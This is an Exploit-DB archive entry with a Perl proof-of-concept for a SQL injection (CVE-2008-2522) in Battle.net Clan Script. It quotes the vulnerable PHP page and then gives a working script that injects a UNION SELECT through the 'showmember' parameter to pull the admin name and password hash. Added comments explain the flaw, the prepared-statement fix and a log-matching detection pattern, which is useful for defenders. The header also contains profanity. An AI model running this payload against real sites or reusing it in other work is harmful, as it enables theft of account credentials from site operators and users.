Battle.net Clan Script <= 1.5.x - Remote SQL Injection Exploit

2008-05-12T00:00:00
ID EDB-ID:5597
Type exploitdb
Reporter Stack
Modified 2008-05-12T00:00:00

Description

Battle.net Clan Script <= 1.5.x Remote SQL Injection Exploit. CVE-2008-2522. Web application exploit for the PHP platform.

                                        
                                            #!/usr/bin/perl -w
# download script : http://sourceforge.net/project/showfiles.php?group_id=142506&package_id=156487
##############################################################
# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit   #
##############################################################
########################################
#[*] Found by : Stack-Terrorist [v40]
#[*] Contact: Ev!L
#[*] Greetz : Houssamix & All muslims HaCkeRs  :)
#[*] Fuck   : JosS :@
########################################
# vulnerable page
########################################
#&lt;div id="header"&gt;&lt;h1&gt;&lt;?php echo $site_name ?&gt;&lt;/h1&gt;&lt;/div&gt;
#&lt;div id="gutter"&gt;&lt;/div&gt;
#&lt;div id="col1"&gt;
# &lt;?php showNav(); ?&gt;#div&gt;
#&lt;div id="col2"&gt;
# &lt;?php
# if(!isset($_GET['showmember']))
# { ?&gt;
#  &lt;h2&gt;Members&lt;/h2&gt;
#  &lt;table id="members"&gt;
#   &lt;tr&gt;
#    &lt;th&gt;Rank&lt;/th&gt;
#    &lt;th&gt;Member Name&lt;/th&gt;
#    &lt;th&gt;Email&lt;/th&gt;
#    &lt;th&gt;Date Joined&lt;/th&gt;
#   &lt;/tr&gt;
#   &lt;?php#mysql_select_db($mysql_db) or die(mysql_error());
#   $sql = 'SELECT bcs_members.id, bcs_members.name, bcs_members.email, bcs_members.date, bcs_ranks.`order`, bcs_ranks.name AS rank '
#    . 'FROM bcs_members, bcs_ranks WHERE bcs_members.rank = bcs_ranks.id ORDER BY `order`, id';
#   $alt = 0;
#   $result = mysql_query($sql)  or die(mysql_error());
#   while($r=mysql_fetch_array($result))
#   {
#    $id=$r["id"];
#    $name=$r["name"];
#    $rank=$r["rank"];
##    $email=$r["email"];
 #   $recruit=$r["recruit"];
 #   $date=$r["date"];
 #   if($recruit === '') { $recruit = '&nbsp;'; }
 #   if ($alt % 2 == 0) { echo '&lt;tr class="altrow"&gt;' . "\n"; }
 ##   else {  echo '&lt;tr&gt;' . "\n"; }
  #  echo '&lt;td&gt;' . $rank . '&lt;/td&gt;' . "\n";
  #  echo '&lt;td&gt;&lt;a href="?page=members&showmember=' . $name . '"&gt;' . $name . '&lt;/a&gt;&lt;/td&gt;' . "\n";
  ##  if($email === '') { echo '&lt;td&gt;n/a&lt;/td&gt;' . "\n"; }
   # else { echo '&lt;td&gt;&lt;a href="mailto:' . $email . '"&gt;Email&lt;/a&gt;&lt;/td&gt;' . "\n"; }
   # echo '&lt;td&gt;' . date("F d, Y", strtotime($date)) . '&lt;/td&gt;' . "\n";
   # echo '&lt;/tr&gt;' . "\n";
   # $alt = $alt + 1;
   #}
   #?&gt;
  #&lt;/table&gt;
# &lt;?php
 #} // end of if $_GET
 #else
 #{?&gt;
 # &lt;h2&gt;Member Details&lt;/h2&gt;
 # &lt;table id="members"&gt;
 #  &lt;tr&gt;
 #   &lt;th&gt;Rank&lt;/th&gt;
 #   &lt;th&gt;Member Name&lt;/th&gt;
 #   &lt;th&gt;Email&lt;/th&gt;
  #  &lt;th&gt;Date Joined&lt;/th&gt;
  # &lt;/tr&gt;
  # &lt;tr&gt;
  # &lt;?php
  # mysql_connect($mysql_host, $mysql_user, $mysql_pass) or die(mysql_error());
  # mysql_select_db($mysql_db) or die(mysql_error());
  # $sql = "SELECT `bcs_members`.`name`, `bcs_members`.`email`, `bcs_members`.`date`, `bcs_ranks`.`name` AS 'rank'"
  #  . "FROM `bcs_members`, `bcs_ranks` WHERE `bcs_members`.`rank` = `bcs_ranks`.`id` AND `bcs_members`.`name` = '" . $_GET['showmember'] . "'";
  # $result = mysql_query($sql)  or die(mysql_error());
  # $r=mysql_fetch_array($result);
  # echo '&lt;td&gt;' . $r["rank"] . '&lt;/td&gt;' . "\n";
  # echo '&lt;td&gt;' . $r["name"] . '&lt;/td&gt;' . "\n";
  # if($r["email"] === '') { echo '&lt;td&gt;n/a&lt;/td&gt;' . "\n"; }
  # else { echo '&lt;td&gt;&lt;a href="mailto:' . $r["email"] . '"&gt;Email&lt;/a&gt;&lt;/td&gt;' . "\n"; }
  # echo '&lt;td&gt;' . date("F d, Y", strtotime($r["date"])) . '&lt;/td&gt;' . "\n";
  # ?&gt;
  # &lt;/tr&gt;
  #&lt;/table&gt;
  #&lt;br/&gt;
  #&lt;h2&gt;Medals&lt;/h2&gt;
  #&lt;table id="members"&gt;
  # &lt;tr&gt;
  #  &lt;th&gt;Medal&lt;/th&gt;
  #  &lt;th&gt;Medal Name&lt;/th&gt;
  #  &lt;th&gt;Description&lt;/th&gt;
  # &lt;/tr&gt;
  # &lt;tr&gt;
  # &lt;?php
  # $alt = 0;
  # $sql = 'SELECT `bcs_medals` . `path` , `bcs_medals` . `name` , `bcs_medals` . `description` '
  #  . ' FROM `bcs_medals` , `bcs_members` , `bcs_medal_list` '
   # . " WHERE `bcs_members` . `name` = '" . $_GET['showmember'] . "'"
   # . ' AND `bcs_medal_list` . `mem_id` = `bcs_members` . `id` '
  #  . ' AND `bcs_medal_list` . `medal` = `bcs_medals` . `id` ';
  # $result = mysql_query($sql)  or die(mysql_error());
  # while($r=mysql_fetch_array($result))
  # {
  #  $id=$r["id"];
   # $name=$r["name"];
   # $path=$r["path"];
   # $desc=$r["description"];
   # if ($alt % 2 == 0) { echo '&lt;tr class="altrow"&gt;' . "\n"; }
   # else {  echo '&lt;tr&gt;' . "\n"; }
   # echo '&lt;td class="center"&gt;&lt;img src="' . $path . '" alt="' . $name . '"/&gt;&lt;/td&gt;' . "\n";
   # echo "&lt;td&gt;" . $name . "&lt;/td&gt;\n";
   # echo "&lt;td&gt;" . $desc . "&lt;/td&gt;\n";
   # echo "&lt;/tr&gt;\n";
   # $alt = $alt + 1;
   #}?&gt;
#   &lt;/tr&gt;
#  &lt;/table&gt;
# &lt;?php
#  echo "&lt;br/&gt;\n";
#  echo "&lt;h2&gt;Recruited&lt;/h2&gt;\n";
#  $result = mysql_query("SELECT bcs_members.name FROM bcs_members, (SELECT id FROM bcs_members WHERE name = '" . $_GET['showmember'] . "') AS results "
#   . "WHERE results.id = bcs_members.recruit")  or die(mysql_error());
#  while($r=mysql_fetch_array($result))
#  {
#   echo $r["name"] . "&lt;br/&gt;\n";
#  }
# }
# ?&gt;
#&lt;/div&gt;
#&lt;div id="footer"&gt;&lt;?php echo $release; ?&gt;&lt;/div&gt;*/
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
# Proof-of-concept for the SQL injection in the commented-out members page
# above: the `showmember` GET parameter is concatenated straight into three
# SQL statements (member details, medals, recruited) with no escaping and no
# parameter binding, so a single quote in the value closes the string
# literal and the remainder of the value is executed as SQL.
# Application-side fix: bind `showmember` with a prepared statement (or at
# minimum escape it) in every query that uses it.
# Detection: the request built below leaves a literal `'%20union%20select%20`
# in the `showmember` query string, which is easy to match in access logs.
#
# Script-level notes: runs under -w only, with no `use strict`, so every
# variable is an undeclared package global (`$b` is also sort()'s special).
# `color` is a cmd.exe builtin: these system() calls only change the console
# colour on Windows, and their return value is never checked.
system("color a");
print "\t\t############################################################\n\n";
print "\t\t# Battle.net Clan Script &lt;= 1.5.x - Remote SQL Inj Exploit #\n\n";
print "\t\t#                 by Stack-Terrorist [v40]                 #\n\n";
print "\t\t############################################################\n\n";
# `use` is resolved at compile time, so this module is loaded before the
# prints above execute despite its position; HTTP::Request, used below, is
# brought in by LWP::UserAgent itself.
use LWP::UserAgent;
# The only argument is the base URL of the installation.
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
system("color f");
# Column and table names in the clan script's own schema (the original
# comments said "joomla", but this targets Battle.net Clan Script, not Joomla).
# column holding the member's login name
$user="name";
# column holding the member's password hash
$pass="password";
# the members table
$tab="bcs_members";
$b = LWP::UserAgent-&gt;new() or die "Could not initialize browser\n";
# Spoofed browser User-Agent; matching on this exact string server-side is of
# little value since it is trivially changed.
$b-&gt;agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# Crafted URL: `-1'` closes the string literal in the vulnerable query, the
# UNION carries four expressions to line up with the four columns that page
# selects (name, email, date, rank), and `/*` comments out the trailing quote.
# `where id=1` assumes the target account is the first member row -- not
# guaranteed by anything on the page.
$host = $ARGV[0] . "/?page=members&showmember=-1'%20union%20select%20".$pass.",user(),44,".$user."+from+".$tab."+where+id=1/*";
# Single GET; no timeout and no HTTP status check, so an error page is parsed
# exactly like a successful one.
$res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));
$answer = $res-&gt;content;
# The vulnerable page echoes the rank cell first and the UNION fills that
# column with `name`, so the first <td> in the response is taken to be the
# account name. Any earlier <td> in the page would make this print wrong data.
if ($answer =~ /&lt;td&gt;(.*?)&lt;\/td&gt;/){
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Admin User : $1";
}
# Any 32-hex-digit run anywhere in the response is reported as the hash. This
# is a heuristic: it assumes an MD5-sized stored hash (the page code does not
# show the hash format) and any other 32-hex string in the page also matches.
# Runtime strings, typos included, are deliberately left as the author wrote them.
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# exploit exploited by Stack-Terrorist 

# milw0rm.com [2008-05-12]